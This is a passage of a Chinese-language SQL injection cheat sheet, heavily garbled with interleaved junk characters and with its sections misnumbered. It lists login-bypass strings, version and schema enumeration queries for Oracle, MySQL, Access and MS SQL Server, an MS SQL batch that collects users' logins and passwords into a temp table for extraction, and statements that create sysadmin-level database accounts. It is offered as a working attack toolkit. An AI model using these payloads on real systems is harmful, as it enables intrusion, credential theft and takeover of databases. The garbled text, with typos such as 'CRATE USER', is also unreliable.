) X% I& T; A2 d- Login:' or 1=1-- 8 M/ L4 L% e9 `- Pass:' or 1=1-- h/ c: r1 L* f8 ^$ O0 M' G, |
- http://website/index.asp?id=' or 1=1-- ) d, B Z1 s$ Q0 C这些是简单的方法,其他如下: * G2 q8 ]8 [. U. \- u# j2 w2 N; @5 @: t8 i0 f
- ' having 1=1-- 8 ~0 _3 i) S. J) ~7 X- ' group by userid having 1=1-- 3 E# ^ v/ U6 p! A4 H \1 y+ v5 E- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--" c6 P% `; g% j4 r8 u) }1 X
- ' union select sum(columnname) from tablename-- 6 P7 z4 w& w! `% H# p6 W % z! V. o& d( h. W1 ~1 U$ P x Z O7 `3 k- g& O& h4 O* n; R% \6 p# v
0 z# s% e+ o2 M3.收集信息8 @" p/ P4 ? h7 F8 ?* w
8 M G3 u. H( @$ {
- ' or 1 in (select @@version)-- 7 N' Y8 K# Y# l: m, H& g5 D- ' union all select @@version-- /*这个优秀/ u5 Z" X2 ]6 _6 K6 N
这些能找到计算机,操作系统,补丁的真实版本。 6 {: W. |8 ~/ _1 g |+ V- q9 W ]& R8 w# I' U% Y
/ Z& D( a4 I" u0 C$ K% m( c! a
* }, I) t3 W$ a- I4 p) Z4.数据类型 0 m% o1 c$ p* o# d6 a! ~ " }) M s" U2 O( ~/ z SOracle 扩展 9 a. j: ?. g9 d9 n-->SYS.USER_OBJECTS (USEROBJECTS)& X* M+ t* @$ R- r
-->SYS.USER_VIEWS 6 K o9 ^4 M" K3 \-->SYS.USER_TABLES 0 Q- N+ s9 S& I. [9 p-->SYS.USER_VIEWS1 y: W' F0 o& b
-->SYS.USER_TAB_COLUMNS* A7 k0 v! r4 G5 `3 n& a7 i% a3 V
-->SYS.USER_CATALOG : O. B% O o: O6 T8 x1 x+ I-->SYS.USER_TRIGGERS 1 {- G( E+ [+ O: k3 | ~' }; T+ t-->SYS.ALL_TABLES ; s l8 d: V" p6 K+ i1 L' J-->SYS.TAB q$ z) `- @4 M2 n ; Y7 p3 Q. D8 `- b2 ?( fMySQL 数据库, C:\WINDOWS>type my.ini得到root密码( u8 _4 h8 l4 N- |6 ], S0 K1 g
-->mysql.user2 l0 l) e: S3 C5 |& C/ h
-->mysql.host ' ^2 c( H4 Y& {6 F' \. l-->mysql.db , f3 _9 D4 i" L$ w- ?: s* G 7 r/ a% @! J. N3 KMS access) K' n5 }+ e4 I" r" j
-->MsysACEs " R( b, k U- \, L- p-->MsysObjects, k# s. T8 ?$ [) Q( l2 g) C8 F
-->MsysQueries( x- }; ^, A9 h# o0 v; W
-->MsysRelationships 7 s2 ~' f E; q5 V( E & j0 L: F% x# A% gMS SQL Server ( z! O3 d0 c- Y8 Y% Y-->sysobjects 4 B) ]. Q* R' D) \' F! \6 i-->syscolumns8 S; A' \5 a% h$ J% @; V2 J+ l
-->systypes- L5 i; P3 L- p) K5 g+ ]- Q) s
-->sysdatabases - f! N! T2 @6 F: C3 o- Z3 [ % Q% k6 b9 k' ]7 y4 M, F- a. k" e0 f% X" X$ d
6 F, O$ u5 }3 z" C5 p s
* R% w# \# T& n: `
5.获取密码 ! W9 M; z1 \, A& w% j t! j & d J4 @6 V1 U! e';begin declare @var varchar(8000) set @var=':' select& P/ A* l; u1 k' ?7 W( ?
2 [% _; D7 f$ y) W& i8 \+ R
@var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end -- / c+ _( i7 B, }/ i X7 Y- l3 l* p! e' and 1 in (select var from temp)-- ! w/ M o) d% D0 _. w( y . M+ _- z( O2 k9 }2 W' ; drop table temp --) T9 }% E: W3 p& _* Z
4 @+ m m; [5 W' ]4 o! ~6.创建数据库帐号$ W% v) }( ]$ _6 G/ h- [9 R1 o
' G& H! z; v/ p2 L& y: y10. MS SQL, J- w4 _- g4 d' Y9 ^8 b E
exec sp_addlogin 'name' , 'password'+ y+ {5 [& R. e# ?' H7 w8 T
exec sp_addsrvrolemember 'name' , 'sysadmin' 加为数据库管理员 7 _7 D& s4 q. w9 X' v $ s8 B: n/ t# W% ?MySQL; h+ f a! w( ^. R/ v7 q5 O! o
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123')) j3 C: n$ y, u# `' P' b
3 J: }5 t4 y& v9 `! S
Access: o0 p0 K/ R N$ G4 [
CRATE USER name IDENTIFIED BY 'pass123' , b0 z' Z+ a& b# @$ [+ \% r+ Q4 U+ q
Postgres (requires Unix account) + Z* [5 e& W1 X) X, S9 E/ yCRATE USER name WITH PASSWORD 'pass123'! ^8 ?7 g3 }5 q- F
" f$ m3 q( h* z$ hOracle5 |; L! O+ d3 W0 O, R$ s6 p
CRATE USER name IDENTIFIED BY pass123, Q2 Q$ [# ?+ I8 B) k$ x& J1 k
TEMPORARY TABLESPACE temp 1 f2 I1 F' u) C. T- ~# g. r, g DEFAULT TABLESPACE users; 3 V1 \8 Y2 d2 W- _& Y1 f- O* ]- qGRANT CONNECT TO name;4 s) L, K4 j1 W8 J8 s
GRANT RESOURCE TO name;( r' _$ W# V2 ~9 w
+ S( m2 g, D: a2 D/ ?4 O# p; V* {/ y2 |( m' b0 S* O, s
4 C h1 J( {2 z* ]$ P+ s. N
8.服务器名字与配置9 {; p/ n" T* _& Q/ @
- {) z# t) [! R0 i
7 h/ k+ o7 X7 X1 ^" s8 w0 @' j1 B' [1 Q5 z6 k
- ' and 1 in (select @@servername)--, n4 r i) L0 l V7 a0 t
- ' and 1 in (select servername from master.sysservers)--) o0 h R2 q7 ?) u; b1 K